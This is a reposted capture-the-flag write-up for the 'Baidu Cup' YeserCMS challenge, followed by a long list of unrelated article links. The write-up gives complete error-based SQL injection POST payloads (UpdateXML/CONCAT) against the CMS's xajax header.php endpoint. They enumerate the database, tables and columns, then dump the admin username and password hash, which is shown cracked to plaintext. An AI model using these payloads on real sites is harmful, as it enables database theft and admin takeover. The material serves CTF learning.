"Baidu Cup" CTF Competition in September_YeserCMS - Code World

"Baidu Cup" CTF Competition in September_YeserCMS

Others 2022-04-20 19:12:45 views: 0

The topic is in the i spring and autumn ctf base camp

The prompt of the title is not very useful. Open the link and find that it is actually easycms. Baidu can find many general vulnerabilities.

Here I am using infinite error injection

Visit url/celive/live/header.php and directly perform error injection

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

Continue to POST, get the table

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

There is an embarrassing problem here. The length of the display is not enough. It is adjusted by adjusting 1 of 1 and 32. Because there are too many tables in it (I don’t know how the big guys accurately locate the table of yesercms_user), Then run the field

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

Last burst user password:

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

The length of md5 is not enough here, you still need to adjust 1,32 to view the complete md5

Get the account password admin|ff512d4240cbbdeafada404677ccbe61, decrypt and get the plaintext: Yeser231

Log in to the admin account to go to the background management interface, frantically search for the upload point, and find that it doesn't seem to be useful. Trying to write a sentence in the file seems to be unsuccessful. After reading wp, I know that there is a file read in the current template editor. Take loopholes

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324404046&siteId=291194637

"Baidu Cup" CTF Competition in September_YeserCMS

"Baidu Cup" CTF Competition in October_Login

"Baidu Cup" CTF Competition in September _Test (ocean cms front desk getshell)

"Baidu Cup" CTF Competition 2017 February (Misc Web)

"Baidu Cup" CTF game September Course Web-SQL

"Baidu Cup" CTF game December games Blog · Advanced articles

The 1st Ganwang Cup Cyber Security Competition 2020GW-CTF Writeup

CTF Security Competition Introduction

Red Hat Cup-ctf

K12 education smart applications emerge, and Baidu Smart Cloud’s “Qianfan Cup” competition system is newly upgraded

Blue Bridge Cup competition schedule

Challenge Cup competition experience sharing

injection sql <> filtered bypass select - September cup Baidu second field SQL

Baidu monte la scène, des milliers d'entreprises s'affrontent, et la Wenxin Cup Entrepreneurship Competition est devenue la nouvelle favorite des investisseurs ?

Usb data packet traffic analysis questions of the 2020 Tianjin ctf competition

CTF - Cyber Security Competition (Isn’t this more fun than the King?)

2018 Blue Bridge Cup competition questions

The First Ganwang Cup Cyber Security Competition [parseHash]

Blue Bridge Cup Competition SCM Group Articles

Analysis of 2023 Huashu Cup Competition Questions

Lanqiao Cup 2021 Provincial Competition Python

Lanqiao Cup 2020 Provincial Competition python

Card【Blue Bridge Cup National Competition】

Huawei Cup Mathematical Modeling Competition Experience Sharing

Zongheng Cup Network Security Competition Writeup

Disgusting Baidu, bad business competition, keyword embezzlement Baidu bidding is everywhere

The 14th Blue Bridge Cup Competition Software Competition Provincial Competition (C/C++ Group B)

The 14th Lanqiao Cup Competition Software Competition Provincial Competition (Python University Group A)

Deeply convinced Cup CTF online reverse problem solution

[Foolish Old Man Series] Cyber Security Advanced Class 095. CTF Hacking Competition in June 2023 (Introduction to CTF Introduction)

Recommended

The sixth meeting of openKylin Community Ecology Committee was successfully held

Alibaba Cloud officially releases Tongyi Qianwen 2.5

Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter

Stack Overflow used my code to train large AI models and banned my account.

Pop!_OS’s COSMIC desktop completes App Store listing

Report: Django is still the first choice for 74% of developers

"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report

15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?

Ranking

Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures

Der M-Chip-Mac implementiert mehrere Android-Emulatoren

CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.

Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery

python3 pip ipython installation

A lot of python crawler source code sharing -- talk about the little thing about python crawler

Agile Sprint in Alpha Stage (7)

Access URL in Unity

FunctoinDemo form

MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq

Daily

More

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)